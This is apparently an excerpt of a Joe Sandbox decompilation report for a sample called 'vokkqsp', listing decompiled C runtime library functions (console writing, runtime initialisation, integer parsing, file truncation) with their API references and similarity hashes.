				if(_t13 == 0 && GetLastError() == 6) {
					E00437897();
					E00437859();
					_t13 = WriteConsoleW( *0x44b8a0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                                      0x004378cb
                                                      0x004378cf
                                                      0x004378dc
                                                      0x004378e1
                                                      0x004378fc
                                                      0x004378fc
                                                      0x00437902

                                                      APIs
                                                      • WriteConsoleW.KERNEL32(00000000,00000000,0040B5F0,00000000,00000000,?,00435F45,00000000,00000001,00000000,?,?,0042F004,?,00000000,00000000), ref: 004378C5
                                                      • GetLastError.KERNEL32(?,00435F45,00000000,00000001,00000000,?,?,0042F004,?,00000000,00000000,?,?,?,0042F5C2,?), ref: 004378D1
                                                        • Part of subcall function 00437897: CloseHandle.KERNEL32(FFFFFFFE,004378E1,?,00435F45,00000000,00000001,00000000,?,?,0042F004,?,00000000,00000000,?,?), ref: 004378A7
                                                      • ___initconout.LIBCMT ref: 004378E1
                                                        • Part of subcall function 00437859: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00437888,00435F32,?,?,0042F004,?,00000000,00000000,?), ref: 0043786C
                                                      • WriteConsoleW.KERNEL32(00000000,00000000,0040B5F0,00000000,?,00435F45,00000000,00000001,00000000,?,?,0042F004,?,00000000,00000000,?), ref: 004378F6
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                      • String ID:
                                                      • API String ID: 2744216297-0
                                                      • Opcode ID: 6e582ee79fb1ed803e2630fc6a0962517340ea2a41cc3bde99d58195e4f98115
                                                      • Instruction ID: 22b6f59ee15599036e5c73f0270e66a6ff9f85d653d9d85115b14f437bec4b43
                                                      • Opcode Fuzzy Hash: 6e582ee79fb1ed803e2630fc6a0962517340ea2a41cc3bde99d58195e4f98115
                                                      • Instruction Fuzzy Hash: 66F0AC3A505229BBCF263FA5EC0999A3F66FF4E3A5F144025FA5995130C6328860DB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403AF6 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00403AF6() {
				void* _t4;
				void* _t8;

				E0040475E();
				E004046DA();
				if(E00404140() != 0) {
					_t4 = E004040F2(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00404191();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                                                      0x00403af6
                                                      0x00403afb
                                                      0x00403b07
                                                      0x00403b0c
                                                      0x00403b11
                                                      0x00403b13
                                                      0x00403b1e
                                                      0x00403b15
                                                      0x00403b15
                                                      0x00000000
                                                      0x00403b15
                                                      0x00403b09
                                                      0x00403b09
                                                      0x00403b0b
                                                      0x00403b0b

                                                      APIs
                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00403AF6
                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00403AFB
                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00403B00
                                                        • Part of subcall function 00404140: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00404151
                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00403B15
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                      • String ID:
                                                      • API String ID: 1761009282-0
                                                      • Opcode ID: 7a7498125a55d97f1734575f0e03abc808c245be13710037763309c14590fef9
                                                      • Instruction ID: 5063de22238e8fde340bb7ff1e9f0e3fd58f9e9733011535d8d0ee6cf0641d0e
                                                      • Opcode Fuzzy Hash: 7a7498125a55d97f1734575f0e03abc808c245be13710037763309c14590fef9
                                                      • Instruction Fuzzy Hash: 33C0029410411150DC107FB321161592F1408E638D79014FBE7513F5C79A3F5946643E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E198 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E0041E198(intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, signed char _a20) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				intOrPtr* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t88;
				intOrPtr _t90;
				signed int _t93;
				signed int _t94;
				signed int _t108;
				signed int _t109;
				signed char _t111;
				signed int _t112;
				intOrPtr _t114;
				signed int _t115;
				signed int _t119;
				signed int _t122;
				intOrPtr* _t126;
				signed int _t133;
				signed int _t134;
				intOrPtr* _t140;
				signed int _t143;
				intOrPtr _t145;
				signed char _t148;
				signed int _t149;
				signed int _t150;
				intOrPtr* _t152;
				signed int _t153;
				signed int* _t157;
				signed int _t160;
				intOrPtr* _t161;
				intOrPtr* _t163;
				signed int _t165;
				void* _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				void* _t176;
				void* _t177;

				if(E0041C4A4( &_a8) == 0) {
					L5:
					_t152 = _a12;
					if(_t152 != 0) {
						 *_t152 = _a8;
					}
					L60:
					return 0;
				}
				_t173 = _a16;
				if(_t173 == 0 || _t173 >= 2 && _t173 <= 0x24) {
					_t88 = _a8;
					_t172 = 0;
					_v20 = _v20 & 0x00000000;
					_v44 = _t88;
					_t148 =  *_t88;
					_a8 = _t88 + 1;
					_t90 = _a4;
					_v12 = _t148;
					__eflags =  *((char*)(_t90 + 0x14));
					if( *((char*)(_t90 + 0x14)) == 0) {
						E0041C290(_t90, _t165);
						_t90 = _a4;
					}
					_t91 = _t90 + 0xc;
					_v16 = _t90 + 0xc;
					_t93 = E0041ED03(_t148, _t165, _t172, _t173, _t148 & 0x000000ff, 8, _t91);
					_t177 = _t176 + 0xc;
					__eflags = _t93;
					if(_t93 == 0) {
						L13:
						_t94 = _a20 & 0x000000ff;
						_v8 = _t94;
						__eflags = _t148 - 0x2d;
						if(_t148 != 0x2d) {
							__eflags = _t148 - 0x2b;
							if(_t148 != 0x2b) {
								_t153 = _a8;
								L18:
								__eflags = _t173;
								if(_t173 == 0) {
									L20:
									__eflags = _t148 - 0x30 - 9;
									if(_t148 - 0x30 > 9) {
										__eflags = _t148 - 0x61 - 0x19;
										if(_t148 - 0x61 > 0x19) {
											__eflags = _t148 - 0x41 - 0x19;
											if(_t148 - 0x41 > 0x19) {
												L35:
												__eflags = _t173;
												if(_t173 == 0) {
													_t173 = 0xa;
												}
												L37:
												_t101 = _t173;
												asm("cdq");
												_t154 = _t165;
												_v28 = _t173;
												_v24 = _t165;
												_v36 = E0043A380(0xffffffff, 0xffffffff, _t101, _t154);
												_v32 = _t165;
												while(1) {
													__eflags = _t148 - 0x30 - 9;
													if(_t148 - 0x30 > 9) {
														__eflags = _t148 - 0x61 - 0x19;
														if(_t148 - 0x61 > 0x19) {
															_t108 = _t148 - 0x41;
															__eflags = _t108 - 0x19;
															if(_t108 > 0x19) {
																_t109 = _t108 | 0xffffffff;
																__eflags = _t109;
															} else {
																_t109 = _t148 + 0xffffffc9;
															}
														} else {
															_t109 = _t148 + 0xffffffa9;
														}
													} else {
														_t109 = _t148 + 0xffffffd0;
													}
													_v16 = _t109;
													__eflags = _t109 - _t173;
													if(_t109 >= _t173) {
														break;
													}
													_t150 = _v20;
													_v20 = E0043A340(_v28, _v24, _t150, _t172);
													_t160 = _v16 + _v20;
													_v40 = _t165;
													asm("adc eax, edx");
													_v16 = 0;
													__eflags = _t172 - _v32;
													if(__eflags < 0) {
														L50:
														_t165 = 0;
														__eflags = 0;
														L51:
														__eflags = 0 - _v40;
														if(__eflags > 0) {
															L55:
															_t122 = 0;
															__eflags = 0;
															L56:
															_t172 = _v16;
															_v20 = _t160;
															_v8 = _v8 | (_t122 | _t165) << 0x00000002 | 0x00000008;
															_t126 = _a8;
															_t148 =  *_t126;
															_v12 = _t148;
															_a8 = _t126 + 1;
															continue;
														}
														if(__eflags < 0) {
															L54:
															_t122 = 1;
															goto L56;
														}
														__eflags = _t160 - _v20;
														if(_t160 >= _v20) {
															goto L55;
														}
														goto L54;
													}
													if(__eflags > 0) {
														L49:
														_t165 = 1;
														goto L51;
													}
													__eflags = _t150 - _v36;
													if(_t150 <= _v36) {
														goto L50;
													}
													goto L49;
												}
												E0041C052( &_a8, _v12);
												_t111 = _v8;
												__eflags = _t111 & 0x00000008;
												if((_t111 & 0x00000008) != 0) {
													_t149 = _v20;
													_t112 = E0041D8EB(_t111, _t149, _t172);
													__eflags = _t112;
													if(_t112 == 0) {
														__eflags = _v8 & 0x00000002;
														if((_v8 & 0x00000002) != 0) {
															_t149 =  ~_t149;
															asm("adc edi, 0x0");
															_t172 =  ~_t172;
														}
														L73:
														_t174 = _a12;
														__eflags = _t174;
														if(_t174 != 0) {
															 *_t174 = _a8;
														}
														return _t149;
													}
													_t114 = _a4;
													 *((char*)(_t114 + 0x1c)) = 1;
													 *((intOrPtr*)(_t114 + 0x18)) = 0x22;
													_t115 = _v8;
													__eflags = _t115 & 0x00000001;
													if((_t115 & 0x00000001) != 0) {
														_t157 = _a12;
														__eflags = _t115 & 0x00000002;
														if((_t115 & 0x00000002) == 0) {
															__eflags = _t157;
															if(_t157 != 0) {
																_t115 = _a8;
																 *_t157 = _t115;
															}
															return _t115 | 0xffffffff;
														}
														__eflags = _t157;
														if(_t157 != 0) {
															 *_t157 = _a8;
														}
														return 0;
													}
													_t149 = _t149 | 0xffffffff;
													_t172 = _t172 | 0xffffffff;
													goto L73;
												}
												_t119 = _a12;
												__eflags = _t119;
												if(_t119 != 0) {
													 *_t119 = _v44;
												}
												goto L60;
											}
											_t133 = _t148 + 0xffffffc9;
											__eflags = _t133;
											L26:
											__eflags = _t133;
											if(_t133 != 0) {
												goto L35;
											}
											_t134 =  *_t153;
											_t161 = _t153 + 1;
											_v16 = _t134;
											_a8 = _t161;
											__eflags = _t134 - 0x78;
											if(_t134 == 0x78) {
												L32:
												__eflags = _t173;
												if(_t173 == 0) {
													_t173 = 0x10;
												}
												_t148 =  *_t161;
												_v12 = _t148;
												_a8 = _t161 + 1;
												goto L37;
											}
											__eflags = _t134 - 0x58;
											if(_t134 == 0x58) {
												goto L32;
											}
											__eflags = _t173;
											if(_t173 == 0) {
												_t173 = 8;
											}
											E0041C052( &_a8, _v16);
											goto L37;
										}
										_t133 = _t148 + 0xffffffa9;
										goto L26;
									}
									_t133 = _t148 + 0xffffffd0;
									goto L26;
								}
								__eflags = _t173 - 0x10;
								if(_t173 != 0x10) {
									goto L37;
								}
								goto L20;
							}
							L16:
							_t163 = _a8;
							_t148 =  *_t163;
							_t153 = _t163 + 1;
							_v12 = _t148;
							_a8 = _t153;
							goto L18;
						}
						_v8 = _t94 | 0x00000002;
						goto L16;
					}
					_t175 = _v16;
					do {
						_t140 = _a8;
						_t148 =  *_t140;
						_a8 = _t140 + 1;
						_v12 = _t148;
						_t143 = E0041ED03(_t148, _t165, _t172, _t175, _t148 & 0x000000ff, 8, _t175);
						_t177 = _t177 + 0xc;
						__eflags = _t143;
					} while (_t143 != 0);
					_t173 = _a16;
					goto L13;
				} else {
					_t145 = _a4;
					 *((char*)(_t145 + 0x1c)) = 1;
					 *((intOrPtr*)(_t145 + 0x18)) = 0x16;
					E0041F0ED(_t171, _t173, 0, 0, 0, 0, 0, _t145);
					goto L5;
				}
			}




















































                                                      0x0041e1ad
                                                      0x0041e1de
                                                      0x0041e1de
                                                      0x0041e1e3
                                                      0x0041e1ec
                                                      0x0041e1ec
                                                      0x0041e3dd
                                                      0x00000000
                                                      0x0041e3df
                                                      0x0041e1af
                                                      0x0041e1b4
                                                      0x0041e1f3
                                                      0x0041e1f6
                                                      0x0041e1f8
                                                      0x0041e1fc
                                                      0x0041e1ff
                                                      0x0041e202
                                                      0x0041e205
                                                      0x0041e208
                                                      0x0041e20b
                                                      0x0041e20f
                                                      0x0041e213
                                                      0x0041e218
                                                      0x0041e218
                                                      0x0041e21b
                                                      0x0041e21f
                                                      0x0041e228
                                                      0x0041e22d
                                                      0x0041e230
                                                      0x0041e232
                                                      0x0041e259
                                                      0x0041e259
                                                      0x0041e25d
                                                      0x0041e260
                                                      0x0041e263
                                                      0x0041e26d
                                                      0x0041e270
                                                      0x0041e280
                                                      0x0041e283
                                                      0x0041e283
                                                      0x0041e285
                                                      0x0041e28c
                                                      0x0041e290
                                                      0x0041e292
                                                      0x0041e2a0
                                                      0x0041e2a2
                                                      0x0041e2b0
                                                      0x0041e2b2
                                                      0x0041e2f7
                                                      0x0041e2f7
                                                      0x0041e2f9
                                                      0x0041e2fd
                                                      0x0041e2fd
                                                      0x0041e2fe
                                                      0x0041e2fe
                                                      0x0041e300
                                                      0x0041e301
                                                      0x0041e303
                                                      0x0041e30c
                                                      0x0041e314
                                                      0x0041e317
                                                      0x0041e31a
                                                      0x0041e31e
                                                      0x0041e320
                                                      0x0041e32e
                                                      0x0041e330
                                                      0x0041e33c
                                                      0x0041e33e
                                                      0x0041e340
                                                      0x0041e34a
                                                      0x0041e34a
                                                      0x0041e342
                                                      0x0041e345
                                                      0x0041e345
                                                      0x0041e332
                                                      0x0041e335
                                                      0x0041e335
                                                      0x0041e322
                                                      0x0041e325
                                                      0x0041e325
                                                      0x0041e34d
                                                      0x0041e350
                                                      0x0041e352
                                                      0x00000000
                                                      0x00000000
                                                      0x0041e354
                                                      0x0041e367
                                                      0x0041e36c
                                                      0x0041e36f
                                                      0x0041e372
                                                      0x0041e374
                                                      0x0041e377
                                                      0x0041e37a
                                                      0x0041e388
                                                      0x0041e388
                                                      0x0041e388
                                                      0x0041e38a
                                                      0x0041e38a
                                                      0x0041e38d
                                                      0x0041e39b
                                                      0x0041e39b
                                                      0x0041e39b
                                                      0x0041e39d
                                                      0x0041e39d
                                                      0x0041e3a8
                                                      0x0041e3ab
                                                      0x0041e3ae
                                                      0x0041e3b1
                                                      0x0041e3b4
                                                      0x0041e3b7
                                                      0x00000000
                                                      0x0041e3b7
                                                      0x0041e38f
                                                      0x0041e396
                                                      0x0041e398
                                                      0x00000000
                                                      0x0041e398
                                                      0x0041e391
                                                      0x0041e394
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041e394
                                                      0x0041e37c
                                                      0x0041e383
                                                      0x0041e385
                                                      0x00000000
                                                      0x0041e385
                                                      0x0041e37e
                                                      0x0041e381
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041e381
                                                      0x0041e3c5
                                                      0x0041e3ca
                                                      0x0041e3cd
                                                      0x0041e3cf
                                                      0x0041e3e3
                                                      0x0041e3e9
                                                      0x0041e3f1
                                                      0x0041e3f3
                                                      0x0041e43e
                                                      0x0041e442
                                                      0x0041e444
                                                      0x0041e446
                                                      0x0041e449
                                                      0x0041e449
                                                      0x0041e44b
                                                      0x0041e44b
                                                      0x0041e44e
                                                      0x0041e450
                                                      0x0041e455
                                                      0x0041e455
                                                      0x00000000
                                                      0x0041e459
                                                      0x0041e3f5
                                                      0x0041e3f8
                                                      0x0041e3fc
                                                      0x0041e403
                                                      0x0041e406
                                                      0x0041e408
                                                      0x0041e412
                                                      0x0041e415
                                                      0x0041e417
                                                      0x0041e42b
                                                      0x0041e42d
                                                      0x0041e42f
                                                      0x0041e432
                                                      0x0041e432
                                                      0x00000000
                                                      0x0041e437
                                                      0x0041e419
                                                      0x0041e41b
                                                      0x0041e420
                                                      0x0041e420
                                                      0x00000000
                                                      0x0041e424
                                                      0x0041e40a
                                                      0x0041e40d
                                                      0x00000000
                                                      0x0041e40d
                                                      0x0041e3d1
                                                      0x0041e3d4
                                                      0x0041e3d6
                                                      0x0041e3db
                                                      0x0041e3db
                                                      0x00000000
                                                      0x0041e3d6
                                                      0x0041e2b7
                                                      0x0041e2b7
                                                      0x0041e2ba
                                                      0x0041e2ba
                                                      0x0041e2bc
                                                      0x00000000
                                                      0x00000000
                                                      0x0041e2be
                                                      0x0041e2c0
                                                      0x0041e2c1
                                                      0x0041e2c4
                                                      0x0041e2c7
                                                      0x0041e2c9
                                                      0x0041e2e3
                                                      0x0041e2e3
                                                      0x0041e2e5
                                                      0x0041e2e9
                                                      0x0041e2e9
                                                      0x0041e2ea
                                                      0x0041e2ef
                                                      0x0041e2f2
                                                      0x00000000
                                                      0x0041e2f2
                                                      0x0041e2cb
                                                      0x0041e2cd
                                                      0x00000000
                                                      0x00000000
                                                      0x0041e2cf
                                                      0x0041e2d1
                                                      0x0041e2d5
                                                      0x0041e2d5
                                                      0x0041e2dc
                                                      0x00000000
                                                      0x0041e2dc
                                                      0x0041e2a7
                                                      0x00000000
                                                      0x0041e2a7
                                                      0x0041e297
                                                      0x00000000
                                                      0x0041e297
                                                      0x0041e287
                                                      0x0041e28a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041e28a
                                                      0x0041e272
                                                      0x0041e272
                                                      0x0041e275
                                                      0x0041e277
                                                      0x0041e278
                                                      0x0041e27b
                                                      0x00000000
                                                      0x0041e27b
                                                      0x0041e268
                                                      0x00000000
                                                      0x0041e268
                                                      0x0041e234
                                                      0x0041e237
                                                      0x0041e237
                                                      0x0041e23d
                                                      0x0041e240
                                                      0x0041e247
                                                      0x0041e24a
                                                      0x0041e24f
                                                      0x0041e252
                                                      0x0041e252
                                                      0x0041e256
                                                      0x00000000
                                                      0x0041e1c0
                                                      0x0041e1c0
                                                      0x0041e1c4
                                                      0x0041e1c8
                                                      0x0041e1d6
                                                      0x00000000
                                                      0x0041e1db

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: __aulldiv
                                                      • String ID: +$-
                                                      • API String ID: 3732870572-2137968064
                                                      • Opcode ID: 2463409298cf016e1f683f3705ffdaf385a2360dacbcdc523155cee1220fc72f
                                                      • Instruction ID: ad05776d2cca18554000b65d1b84f4afe65f299759716952998259f36cd2e265
                                                      • Opcode Fuzzy Hash: 2463409298cf016e1f683f3705ffdaf385a2360dacbcdc523155cee1220fc72f
                                                      • Instruction Fuzzy Hash: 64A1E734E401589FCF24CE7AC8506EE7BA5EF56324F14859BECB5DB381C238D9828B59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004358FB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 155fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E004358FB(signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				int _v28;
				int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				int _t53;
				signed int _t54;
				int _t57;
				long _t58;
				intOrPtr _t60;
				int _t61;
				void* _t62;
				intOrPtr _t66;
				int _t69;
				void* _t72;
				int _t75;
				signed int _t78;
				intOrPtr _t79;
				int _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				void* _t84;
				int _t89;

				_t78 = __edx;
				_t67 = _a4;
				_t3 =  &_a12; // 0x42e56d
				E0043572D( &_v48, __edx, _a4, _a8,  *_t3);
				if((_v48 & _v44) == 0xffffffff || (_v40 & _v36) == 0xffffffff) {
					_t79 = _a16;
					__eflags =  *((char*)(_t79 + 0x1c));
					if( *((char*)(_t79 + 0x1c)) == 0) {
						_t80 = 0x16;
						goto L36;
					}
					goto L34;
				} else {
					_t69 = _v28;
					_t53 = _v32;
					_v12 = _t69;
					_v8 = _t53;
					_t89 = _t69;
					if(_t89 < 0) {
						L28:
						_t54 = E0041F88F(_t78, _t67, _a8, _a12, 0);
						_t84 = _t84 + 0x10;
						__eflags = (_t54 & _t78) - 0xffffffff;
						if((_t54 & _t78) != 0xffffffff) {
							_t57 = SetEndOfFile(E004267AD(_t67));
							__eflags = _t57;
							if(_t57 != 0) {
								L17:
								_t80 = 0;
								L36:
								E0041F88F(_t78, _v24, _v48, _v44, 0);
								return _t80;
							}
							_t82 = _a16;
							_t58 = GetLastError();
							 *((char*)(_t82 + 0x24)) = 1;
							 *(_t82 + 0x20) = _t58;
							_t80 = 0xd;
							 *((char*)(_t82 + 0x1c)) = 1;
							 *((intOrPtr*)(_t82 + 0x18)) = _t80;
							goto L36;
						}
						_t79 = _a16;
						__eflags =  *((char*)(_t79 + 0x1c));
						if( *((char*)(_t79 + 0x1c)) == 0) {
							goto L17;
						}
						L34:
						_t80 =  *((intOrPtr*)(_t79 + 0x18));
						goto L36;
					}
					if(_t89 > 0 || _t53 != 0) {
						_t83 = E004108CD(0x1000, 1);
						_pop(_t72);
						if(_t59 != 0) {
							_t60 = E0040E20E(_t72, _t67, 0x8000);
							_t81 = _a16;
							_t75 = _v32;
							_v16 = _t60;
							_t61 = _v28;
							do {
								__eflags = _t61;
								if(__eflags < 0) {
									L12:
									_t62 = E0042F4F4(_t67, _t83, _t75, _t81);
									_t84 = _t84 + 0x10;
									__eflags = _t62 - 0xffffffff;
									if(_t62 == 0xffffffff) {
										__eflags =  *((char*)(_t81 + 0x24));
										if( *((char*)(_t81 + 0x24)) != 0) {
											__eflags =  *((intOrPtr*)(_t81 + 0x20)) - 5;
											if( *((intOrPtr*)(_t81 + 0x20)) == 5) {
												 *((char*)(_t81 + 0x1c)) = 1;
												 *((intOrPtr*)(_t81 + 0x18)) = 0xd;
											}
										}
										__eflags =  *((char*)(_t81 + 0x1c));
										if( *((char*)(_t81 + 0x1c)) == 0) {
											_t80 = 0;
											__eflags = 0;
										} else {
											_t80 =  *((intOrPtr*)(_t81 + 0x18));
										}
										goto L24;
									}
									asm("cdq");
									_t75 = _v8 - _t62;
									_t61 = _v12;
									_v8 = _t75;
									asm("sbb eax, edx");
									_v12 = _t61;
									__eflags = _t61;
									if(__eflags > 0) {
										L11:
										_t75 = 0x1000;
										goto L12;
									}
									if(__eflags < 0) {
										break;
									}
									goto L15;
								}
								if(__eflags > 0) {
									goto L11;
								}
								__eflags = _t75 - 0x1000;
								if(_t75 < 0x1000) {
									goto L12;
								}
								goto L11;
								L15:
								__eflags = _t75;
							} while (_t75 != 0);
							E0040E20E(_t75, _t67, _v16);
							E0041072C(_t83);
							_t84 = _t84 + 0xc;
							goto L17;
						} else {
							_t66 = _a16;
							_t80 = 0xc;
							 *((char*)(_t66 + 0x1c)) = 1;
							 *((intOrPtr*)(_t66 + 0x18)) = _t80;
							L24:
							E0041072C(_t83);
							goto L36;
						}
					} else {
						__eflags = _t69;
						if(__eflags > 0) {
							goto L17;
						}
						if(__eflags < 0) {
							goto L28;
						}
						__eflags = _t53;
						if(_t53 >= 0) {
							goto L17;
						}
						goto L28;
					}
				}
			}































                                                      0x004358fb
                                                      0x00435904
                                                      0x0043590c
                                                      0x00435913
                                                      0x00435921
                                                      0x00435a73
                                                      0x00435a76
                                                      0x00435a7a
                                                      0x00435a83
                                                      0x00000000
                                                      0x00435a83
                                                      0x00000000
                                                      0x00435936
                                                      0x00435936
                                                      0x00435939
                                                      0x0043593c
                                                      0x0043593f
                                                      0x00435942
                                                      0x00435944
                                                      0x00435a22
                                                      0x00435a2b
                                                      0x00435a32
                                                      0x00435a35
                                                      0x00435a38
                                                      0x00435a4d
                                                      0x00435a53
                                                      0x00435a55
                                                      0x004359e4
                                                      0x004359e4
                                                      0x00435a84
                                                      0x00435a8f
                                                      0x00435a9d
                                                      0x00435a9d
                                                      0x00435a57
                                                      0x00435a5a
                                                      0x00435a62
                                                      0x00435a66
                                                      0x00435a69
                                                      0x00435a6a
                                                      0x00435a6e
                                                      0x00000000
                                                      0x00435a6e
                                                      0x00435a3a
                                                      0x00435a3d
                                                      0x00435a41
                                                      0x00000000
                                                      0x00000000
                                                      0x00435a7c
                                                      0x00435a7c
                                                      0x00000000
                                                      0x00435a7c
                                                      0x0043594a
                                                      0x00435960
                                                      0x00435963
                                                      0x00435966
                                                      0x00435980
                                                      0x00435985
                                                      0x0043598a
                                                      0x0043598d
                                                      0x00435990
                                                      0x00435993
                                                      0x00435993
                                                      0x00435995
                                                      0x004359a6
                                                      0x004359aa
                                                      0x004359af
                                                      0x004359b2
                                                      0x004359b5
                                                      0x004359eb
                                                      0x004359ef
                                                      0x004359f1
                                                      0x004359f5
                                                      0x004359f7
                                                      0x004359fb
                                                      0x004359fb
                                                      0x004359f5
                                                      0x00435a02
                                                      0x00435a06
                                                      0x00435a0d
                                                      0x00435a0d
                                                      0x00435a08
                                                      0x00435a08
                                                      0x00435a08
                                                      0x00000000
                                                      0x00435a06
                                                      0x004359ba
                                                      0x004359bb
                                                      0x004359bd
                                                      0x004359c0
                                                      0x004359c3
                                                      0x004359c5
                                                      0x004359c8
                                                      0x004359ca
                                                      0x004359a1
                                                      0x004359a1
                                                      0x00000000
                                                      0x004359a1
                                                      0x004359cc
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004359cc
                                                      0x00435997
                                                      0x00000000
                                                      0x00000000
                                                      0x00435999
                                                      0x0043599f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004359ce
                                                      0x004359ce
                                                      0x004359ce
                                                      0x004359d6
                                                      0x004359dc
                                                      0x004359e1
                                                      0x00000000
                                                      0x00435968
                                                      0x00435968
                                                      0x0043596d
                                                      0x0043596e
                                                      0x00435972
                                                      0x00435a0f
                                                      0x00435a10
                                                      0x00000000
                                                      0x00435a15
                                                      0x00435a18
                                                      0x00435a18
                                                      0x00435a1a
                                                      0x00000000
                                                      0x00000000
                                                      0x00435a1c
                                                      0x00000000
                                                      0x00000000
                                                      0x00435a1e
                                                      0x00435a20
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00435a20
                                                      0x0043594a

                                                      APIs
                                                      • SetEndOfFile.KERNEL32(00000000,mB,00000000,0042E8B0,?,?,?,?,?,004358E9,00000000,0042E8B0,0042E56D,?,00000000,0042E8B0), ref: 00435A4D
                                                      • GetLastError.KERNEL32(?,?,?,?,?,004358E9,00000000,0042E8B0,0042E56D,?,00000000,0042E8B0), ref: 00435A5A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLast
                                                      • String ID: mB
                                                      • API String ID: 734332943-774331627
                                                      • Opcode ID: 6eefc9189885c32fc259c3aa5a90e29a227daa2a2ed7b6b1a2b73a68ef18d50d
                                                      • Instruction ID: 841d24fc0c8807ef86aaff69bb98071377b6e6ad07ba5b0518031c951c8d5d8c
                                                      • Opcode Fuzzy Hash: 6eefc9189885c32fc259c3aa5a90e29a227daa2a2ed7b6b1a2b73a68ef18d50d
                                                      • Instruction Fuzzy Hash: 51514671900A45EBDB14AF6ACC86B9F7B70AF4C324F14121BF411A72D1D378E891DB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

